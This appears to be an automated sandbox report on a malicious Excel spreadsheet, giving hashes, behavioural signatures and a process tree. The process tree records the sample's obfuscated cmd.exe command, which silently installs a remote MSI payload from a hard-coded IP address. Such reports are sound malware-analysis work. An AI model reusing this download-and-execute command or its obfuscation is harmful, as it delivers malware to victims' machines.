Analysis
-
max time kernel
134s -
max time network
135s -
platform
windows10_x64 -
resource
win10 -
submitted
30-06-2020 12:33
Static task
static1
Behavioral task
behavioral1
Sample
978905601.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
978905601.xls
Resource
win10
General
-
Target
978905601.xls
-
Size
172KB
-
MD5
2a6b788cb122676d3890312e754bfc90
-
SHA1
5744f5012d120edd79f1bb1ed0272b28712127e4
-
SHA256
0018a5d18456d36582b1020be78a055c9c126a8036c618ea956faf722d995bb2
-
SHA512
39a0f085979668395beb3d7a23144cbfeba6c849586bc7a4c5759dc455f3964877ea57795df19bf560a4c9a03a283f0671d656888c8969f8cb7ac58e84cc12a5
Malware Config
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 792 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
msiexec.exepid process 744 msiexec.exe 744 msiexec.exe -
Executes dropped EXE 1 IoCs
Processes:
MSI3B7.tmppid process 3752 MSI3B7.tmp -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 3588 msiexec.exe Token: SeIncreaseQuotaPrivilege 3588 msiexec.exe Token: SeSecurityPrivilege 744 msiexec.exe Token: SeCreateTokenPrivilege 3588 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3588 msiexec.exe Token: SeLockMemoryPrivilege 3588 msiexec.exe Token: SeIncreaseQuotaPrivilege 3588 msiexec.exe Token: SeMachineAccountPrivilege 3588 msiexec.exe Token: SeTcbPrivilege 3588 msiexec.exe Token: SeSecurityPrivilege 3588 msiexec.exe Token: SeTakeOwnershipPrivilege 3588 msiexec.exe Token: SeLoadDriverPrivilege 3588 msiexec.exe Token: SeSystemProfilePrivilege 3588 msiexec.exe Token: SeSystemtimePrivilege 3588 msiexec.exe Token: SeProfSingleProcessPrivilege 3588 msiexec.exe Token: SeIncBasePriorityPrivilege 3588 msiexec.exe Token: SeCreatePagefilePrivilege 3588 msiexec.exe Token: SeCreatePermanentPrivilege 3588 msiexec.exe Token: SeBackupPrivilege 3588 msiexec.exe Token: SeRestorePrivilege 3588 msiexec.exe Token: SeShutdownPrivilege 3588 msiexec.exe Token: SeDebugPrivilege 3588 msiexec.exe Token: SeAuditPrivilege 3588 msiexec.exe Token: SeSystemEnvironmentPrivilege 3588 msiexec.exe Token: SeChangeNotifyPrivilege 3588 msiexec.exe Token: SeRemoteShutdownPrivilege 3588 msiexec.exe Token: SeUndockPrivilege 3588 msiexec.exe Token: SeSyncAgentPrivilege 3588 msiexec.exe Token: SeEnableDelegationPrivilege 3588 msiexec.exe Token: SeManageVolumePrivilege 3588 msiexec.exe Token: SeImpersonatePrivilege 3588 msiexec.exe Token: SeCreateGlobalPrivilege 3588 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe Token: SeRestorePrivilege 744 msiexec.exe Token: SeTakeOwnershipPrivilege 744 msiexec.exe -
Blacklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 8 744 msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE 792 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3188 792 cmd.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEcmd.exemsiexec.exedescription pid process target process PID 792 wrote to memory of 3188 792 EXCEL.EXE cmd.exe PID 792 wrote to memory of 3188 792 EXCEL.EXE cmd.exe PID 3188 wrote to memory of 3588 3188 cmd.exe msiexec.exe PID 3188 wrote to memory of 3588 3188 cmd.exe msiexec.exe PID 744 wrote to memory of 3752 744 msiexec.exe MSI3B7.tmp PID 744 wrote to memory of 3752 744 msiexec.exe MSI3B7.tmp PID 744 wrote to memory of 3752 744 msiexec.exe MSI3B7.tmp -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 3588 msiexec.exe -
Drops file in Windows directory 6 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI26D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFDF7.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Enumerates connected drives 3 TTPs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\978905601.xls"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/978905601.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/978905601.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
- Use of msiexec (install) with remote resource
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Drops file in Windows directory
-
C:\Windows\Installer\MSI3B7.tmp"C:\Windows\Installer\MSI3B7.tmp"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Installer\MSI3B7.tmp
-
C:\Windows\Installer\MSI3B7.tmp
-
memory/3188-2-0x0000000000000000-mapping.dmp
-
memory/3588-3-0x0000000000000000-mapping.dmp
-
memory/3588-4-0x00000155C9F40000-0x00000155C9F44000-memory.dmpFilesize
16KB
-
memory/3752-5-0x0000000000000000-mapping.dmp